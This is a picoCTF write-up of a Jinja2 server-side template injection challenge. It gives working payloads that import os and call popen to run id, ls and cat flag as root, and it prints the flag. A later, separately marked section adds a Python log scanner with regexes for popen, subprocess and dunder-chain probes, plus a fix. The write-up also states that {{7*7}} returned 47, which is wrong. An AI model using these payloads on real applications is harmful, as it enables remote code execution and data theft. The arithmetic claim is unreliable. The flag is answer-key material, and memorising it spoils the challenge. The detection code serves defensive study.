Challenge Description

I made a cool website where you can announce whatever you want!

Try it out! I heard templating is a cool and modular way to build web apps! Check out my website here!

Approach and Steps

{{7*7}} returned 47, therefore the template engine is Jinja2 (Python).

Ran {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}} and got uid=0(root) gid=0(root) groups=0(root) in the response, which means the payload works.

This means that I have RCE.

Ran {{request.application.__globals__.__builtins__.__import__('os').popen('ls').read()}} and got __pycache__ app.py flag requirements.txt.

Running {{request.application.__globals__.__builtins__.__import__('os').popen('cat flag').read()}} gives the flag.
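Added example, not part of this writeup: the probes used in the steps above arrive URL-encoded in the request line, so they leave a clear trace in the web server's access log. The Python script below, written for this page rather than taken from the challenge, decodes a few constructed combined-format log lines and classifies each request by the same indicators seen in the steps above (the {{7*7}} arithmetic probe, the __globals__/__builtins__/__import__ attribute chain, and popen). The log lines, IP addresses, timestamps and the query parameter name announcement are constructed assumptions; the challenge page does not name the form field.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache/nginx "combined" log format. The query
# parameter name "announcement" is an assumption; the challenge page does not
# name the form field the payloads were submitted through.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /?announcement=hello+world HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:01:15 +0000] "GET /?announcement=%7B%7B7*7%7D%7D HTTP/1.1" 200 498 "-" "curl/8.4.0"
10.0.0.9 - - [12/Mar/2024:10:01:40 +0000] "GET /?announcement=%7B%7Brequest.application.__globals__.__builtins__.__import__%28%27os%27%29.popen%28%27id%27%29.read%28%29%7D%7D HTTP/1.1" 200 530 "-" "curl/8.4.0"
10.0.0.7 - - [12/Mar/2024:10:02:03 +0000] "POST /announce HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Ordered from most to least severe; the first matching indicator wins.
INDICATORS = [
    ("critical", "dunder attribute chain (sandbox escape)",
     re.compile(r"__(?:globals|builtins|import|subclasses|class|mro)__")),
    ("high", "OS command primitive inside a template expression",
     re.compile(r"\b(?:popen|system|subprocess)\b")),
    ("medium", "arithmetic template probe",
     re.compile(r"\{\{\s*\d+\s*[-+*/]\s*\d+\s*\}\}")),
    ("low", "template delimiters in user-controlled input",
     re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)),
]


def classify_request(target):
    """Return (severity, reason) for a request target, or None if benign.

    The target is URL-decoded first so that %7B%7B is seen as {{.
    """
    decoded = unquote_plus(target)
    if "{{" not in decoded and "{%" not in decoded:
        return None
    for severity, reason, pattern in INDICATORS:
        if pattern.search(decoded):
            return severity, reason
    return None


def scan_log(text):
    """Parse combined-format log lines and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than crash on them
        verdict = classify_request(m.group("target"))
        if verdict is None:
            continue
        severity, reason = verdict
        findings.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "method": m.group("method"),
            "status": m.group("status"),
            "target": unquote_plus(m.group("target")),
            "severity": severity,
            "reason": reason,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['severity']:8}] {f['ip']} {f['ts']} {f['method']} "
              f"{f['target']} -> {f['reason']}")
```

On the sample log the first line is benign, the {{7*7}} probe is reported as medium, and the __globals__ chain as critical, which is the escalation an analyst would expect to see from one source address within a short window. The underlying defect on the application side is rendering user input as the template source; passing the announcement to a fixed template as a variable instead makes Jinja2 treat the braces as plain text.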

Flag

picoCTF{s4rv3r_s1d3_t3mp14t3_1nj3ct10n5_4r3_c001_bd4cfc64}